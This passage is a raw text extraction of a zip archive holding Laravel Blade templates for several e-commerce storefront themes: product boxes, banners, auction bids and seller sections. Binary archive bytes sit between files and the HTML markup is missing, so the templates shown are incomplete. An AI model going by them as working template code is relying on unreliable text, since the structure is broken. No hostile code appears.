    @php $banner_2_imags = json_decode($homepreorder_banner_1Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp
    @endif @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); $col_val = 6; if ($homeBanner3Images != null){ $col_val = 4; } @endphp
    @if ($homeBanner3Images != null)
    @php $banner_3_imags = json_decode($homeBanner3Images); $home_banner3_links = get_setting('home_banner3_links', null, $lang); @endphp
    @endif
    @if (get_setting('vendor_system_activation') == 1) @php $best_selers = get_best_sellers(10); $homeBanner4Images = get_setting('home_banner4_images', null, $lang); $data_rows = 1; $xxl_items = 5; $xl_items = 4; $lg_items = 3.4; $md_items = 2.5; if ($homeBanner4Images != null){ $data_rows = 2; $xxl_items = 2; $xl_items = 2; $lg_items = 2; $md_items = 3; } @endphp @if (count($best_selers) > 0)
    @if ($homeBanner4Images != null)
    @php $banner_4_imags = json_decode($homeBanner4Images); $home_banner4_links = get_setting('home_banner4_links', null, $lang); @endphp
    @endif

    {{ translate('Top Sellers') }}

    @endif @endif @if (get_setting('top_brands') != null) @php $top_brands = json_decode(get_setting('top_brands')); $brands = get_brands($top_brands); $homeBanner5Images = get_setting('home_banner5_images', null, $lang); $homeBanner6Images = get_setting('home_banner6_images', null, $lang); $col_val = 'col-xl-4'; $data_rows = 3; $xxl_items = 2; $xl_items = 2; $lg_items = 4; $md_items = 3; $sm_items = 2; $xs_items = 1.4; if ($homeBanner5Images == null && $homeBanner6Images == null){ $data_rows = 2; $xxl_items = 6; $xl_items = 5; } elseif ($homeBanner5Images == null || $homeBanner6Images == null) { $col_val = 'col-xxl-8 col-xl-6'; $data_rows = 3; $xxl_items = 2; $xl_items = 3; } @endphp

    {{ translate('Top Brands') }}

    @if ($homeBanner5Images != null) @php $banner_5_imags = json_decode($homeBanner5Images); $home_banner5_links = get_setting('home_banner5_links', null, $lang); @endphp
    @endif @if ($homeBanner6Images != null) @php $banner_6_imags = json_decode($homeBanner6Images); $home_banner6_links = get_setting('home_banner6_links', null, $lang); @endphp
    @endif
    @endif @if (addon_is_activated('auction'))
    @endif @if (get_setting('coupon_system') == 1)
    {{ translate(get_setting('cupon_title')) }}
    {{ translate(get_setting('cupon_subtitle')) }}
    @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(6); @endphp @if (count($classified_products) > 0)

    {{ translate('Classified Ads') }}

    @php $classifiedBannerImage = get_setting('classified_banner_image_small', null, $lang); @endphp
    @endif @endif @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.newest_preorder') @endif
    @endsection PK�N]��w�> > ?views/frontend/megamart/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]V�OO?views/frontend/megamart/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); $lang = get_system_language()->code; $homeBanner3Images = get_setting('home_banner3_images', null, $lang); $xxl_items = 3; $xl_items = 2.5; if ($homeBanner3Images != null){ $xxl_items = 2; $xl_items = 1.8; } @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    @endif PK�N]�48views/frontend/megamart/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(12) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]�#�K��Dviews/frontend/megamart/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $lang = get_system_language()->code; $homeBanner1Images = get_setting('home_banner1_images', null, $lang); $xxl_items = 6; $xl_items = 5; $lg_items = 4; $md_items = 3; if($homeBanner1Images != null){ $xxl_items = 5; $xl_items = 3.5; $lg_items = 3; $md_items = 1.5; } @endphp
    @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif
    @endifPK�N]\��w w Bviews/frontend/megamart/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @if (count($categories) > 0) @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp

    {{ $category_name }}

    @endforeach @endif @endif PK�N]p� ���Bviews/frontend/megamart/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]nT/��Bviews/frontend/megamart/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0) @php $lang = get_system_language()->code; $homeBanner3Images = get_setting('home_banner3_images', null, $lang); $xxl_items = 3; $xl_items = 2.5; if ($homeBanner3Images != null){ $xxl_items = 2; $xl_items = 1.8; } @endphp

    {{ translate('New Products') }}

    @endifPK�N]�JDd  Dviews/frontend/megamart/partials/preorder_products_section.blade.phpnu�[���@if (count($preorder_products) > 0) @php $featured_bg = get_setting('featured_section_bg_color'); @endphp
    @endifPK�N]3�g2ZZAviews/frontend/megamart/partials/preorder_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->product_name }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->auction_product == 0) {{ translate('Add to Cart') }} @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]L�L�&&8views/frontend/megamart/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�H#U & &8views/frontend/megamart/partials/product_box_2.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]��F���6views/frontend/megamart/partials/todays_deal.blade.phpnu�[���@if(count($todays_deal_products) > 0)
    @php $lang = get_system_language()->code; $todays_deal_banner = get_setting('todays_deal_banner', null, $lang); $todays_deal_banner_small = get_setting('todays_deal_banner_small', null, $lang); @endphp
    @if ($todays_deal_banner != null || $todays_deal_banner_small != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif @php $todays_deal_banner_text_color = ((get_setting('todays_deal_banner_text_color') == 'light') || (get_setting('todays_deal_banner_text_color') == null)) ? 'text-white' : 'text-dark'; $col_val = $todays_deal_banner != null ? 'col-xl-7' : 'col-xl-12'; $xxl_items = $todays_deal_banner != null ? 5 : 7; $xl_items = $todays_deal_banner != null ? 4 : 6; @endphp
    @endifPK�N]y���%�%�$views/frontend/metro/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp
    @if (get_setting('home_slider_images', null, $lang) != null) @endif
    @php $flash_deal = get_featured_flash_deal(); $flash_deal_bg = get_setting('flash_deal_bg_color'); $flash_deal_bg_full_width = (get_setting('flash_deal_bg_full_width') == 1) ? true : false; $flash_deal_banner_menu_text = ((get_setting('flash_deal_banner_menu_text') == 'dark') || (get_setting('flash_deal_banner_menu_text') == null)) ? 'text-dark' : 'text-white'; @endphp @if ($flash_deal != null)
    @php $flash_deal_products = get_flash_deal_products($flash_deal->id); @endphp
    @endif @php $todays_deal_section_bg = get_setting('todays_deal_section_bg_color'); @endphp
    @if (count($featured_categories) > 0)

    {{ translate('Featured Categories') }}

    @endif @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $data_md = count($banner_1_imags) >= 2 ? 2 : 1; $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif @if (addon_is_activated('preorder')) @php $homepreorder_banner_1Images = get_setting('home_preorder_banner_1_images', null, $lang); @endphp @if ($homepreorder_banner_1Images != null)
    @php $banner_2_imags = json_decode($homepreorder_banner_1Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp
    @endif @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif
    @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); @endphp @if ($homeBanner3Images != null)
    @php $banner_3_imags = json_decode($homeBanner3Images); $data_md = count($banner_3_imags) >= 2 ? 2 : 1; $home_banner3_links = get_setting('home_banner3_links', null, $lang); @endphp
    @endif @if (addon_is_activated('auction'))
    @endif @if (get_setting('coupon_system') == 1)
    {{ translate(get_setting('cupon_title')) }}
    {{ translate(get_setting('cupon_subtitle')) }}
    {{ env('APP_NAME') }} promo
    @endif
    @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.newest_preorder') @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(6); @endphp @if (count($classified_products) > 0)

    {{ translate('Classified Ads') }}

    @php $classifiedBannerImage = get_setting('classified_banner_image', null, $lang); $classifiedBannerImageSmall = get_setting('classified_banner_image_small', null, $lang); @endphp @if ($classifiedBannerImage != null || $classifiedBannerImageSmall != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif
    @foreach ($classified_products as $key => $classified_product)

    {{ $classified_product->getTranslation('name') }}

    {{ $classified_product->user ? $classified_product->user->name : '' }}
    {{ single_price($classified_product->unit_price) }}
    @if ($classified_product->conditon == 'new') {{ translate('New') }} @elseif($classified_product->conditon == 'used') {{ translate('Used') }} @endif
    @endforeach
    @endif @endif @if (get_setting('vendor_system_activation') == 1) @php $best_selers = get_best_sellers(10); @endphp @if (count($best_selers) > 0)

    {{ translate('Top Sellers') }}

    @endif @endif @if (get_setting('top_brands') != null)

    {{ translate('Top Brands') }}

    @php $top_brands = json_decode(get_setting('top_brands')); $brands = get_brands($top_brands); @endphp @foreach ($brands as $brand) @endforeach
    @endif @endsection PK�N]��w�> > <views/frontend/metro/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]ӉCwww<views/frontend/metro/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    @endif PK�N]�45views/frontend/metro/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(12) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]J��?LLAviews/frontend/metro/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0)

    {{ translate('Featured Products') }}

    @endifPK�N]e'H� � ?views/frontend/metro/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @if (count($categories) > 0)
    @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    @endforeach
    @endif @endif PK�N]?���?views/frontend/metro/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�gc+��?views/frontend/metro/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0)

    {{ translate('New Products') }}

    @endifPK�N]��^^Aviews/frontend/metro/partials/preorder_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $lang = get_system_language()->code; $homeBanner1Images = get_setting('featuredPreorder_images', null, $lang); $xxl_items = 6; $xl_items = 5; $lg_items = 4; $md_items = 3; if($homeBanner1Images != null){ $xxl_items = 5; $xl_items = 3.5; $lg_items = 3; $md_items = 1.5; } @endphp
    @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif
    @endifPK�N]W��G & &5views/frontend/metro/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�:�8&&5views/frontend/metro/partials/product_box_2.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�%�#//3views/frontend/metro/partials/todays_deal.blade.phpnu�[���@if(count($todays_deal_products) > 0)
    @php $lang = get_system_language()->code; $todays_deal_banner = get_setting('todays_deal_banner', null, $lang); $todays_deal_banner_small = get_setting('todays_deal_banner_small', null, $lang); @endphp @if ($todays_deal_banner != null || $todays_deal_banner_small != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif @php $todays_deal_banner_text_color = ((get_setting('todays_deal_banner_text_color') == 'light') || (get_setting('todays_deal_banner_text_color') == null)) ? 'text-white' : 'text-dark'; @endphp
    @endifPK�N]�ۙ5�5�%views/frontend/minima/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @if (get_setting('home_slider_images', null, $lang) != null) @endif
    @if (count($featured_categories) > 0)
    @endif @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $data_md = count($banner_1_imags) >= 2 ? 2 : 1; $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif @if (addon_is_activated('preorder')) @php $homepreorder_banner_1Images = get_setting('home_preorder_banner_1_images', null, $lang); @endphp @if ($homepreorder_banner_1Images != null)
    @php $banner_2_imags = json_decode($homepreorder_banner_1Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp
    @endif @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images); $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif
    @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); @endphp @if (get_setting('home_banner3_images') != null)
    @php $banner_3_imags = json_decode(get_setting('home_banner3_images', null, $lang)); $data_md = count($banner_3_imags) >= 2 ? 2 : 1; $home_banner3_links = get_setting('home_banner3_links', null, $lang); @endphp
    @endif @if (addon_is_activated('auction'))
    @endif
    @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.newest_preorder') @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(6); @endphp @if (count($classified_products) > 0)
    @php $classifiedBannerImage = get_setting('classified_banner_image', null, $lang); $classifiedBannerImageSmall = get_setting('classified_banner_image_small', null, $lang); @endphp @if (get_setting('classified_banner_image') != null || get_setting('classified_banner_image_small') != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif

    {{ translate('Classified Ads') }}

    @foreach ($classified_products as $key => $classified_product)

    {{ $classified_product->getTranslation('name') }}

    {{ $classified_product->user ? $classified_product->user->name : '' }}
    {{ single_price($classified_product->unit_price) }}
    @if ($classified_product->conditon == 'new') {{ translate('New') }} @elseif($classified_product->conditon == 'used') {{ translate('Used') }} @endif
    @endforeach
    @endif @endif @if (get_setting('coupon_system') == 1)
    {{ translate(get_setting('cupon_title')) }}
    {{ translate(get_setting('cupon_subtitle')) }}
    @endif
    @if (get_setting('vendor_system_activation') == 1) @php $best_selers = get_best_sellers(10); @endphp @if (count($best_selers) > 0)

    {{ translate('Top Sellers') }}

    @endif @endif
    @if (get_setting('top_brands') != null)

    {{ translate('Top Brands') }}

    @endif
    @endsection PK�N]��w�> > =views/frontend/minima/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]|�V�QQ=views/frontend/minima/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    @endif PK�N]�46views/frontend/minima/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(12) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]�h�8��Bviews/frontend/minima/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0)

    {{ translate('Featured Products') }}

    @endifPK�N]\��w w @views/frontend/minima/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @if (count($categories) > 0) @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp

    {{ $category_name }}

    @endforeach @endif @endif PK�N]�bz��@views/frontend/minima/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�D���@views/frontend/minima/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0)

    {{ translate('New Products') }}

    @endifPK�N]#��=��Bviews/frontend/minima/partials/preorder_products_section.blade.phpnu�[��� @if (count($preorder_products) > 0)
    @endifPK�N]��`� & &6views/frontend/minima/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�]:� & &6views/frontend/minima/partials/product_box_2.blade.phpnu�[���@php $cart_added = []; @endphp
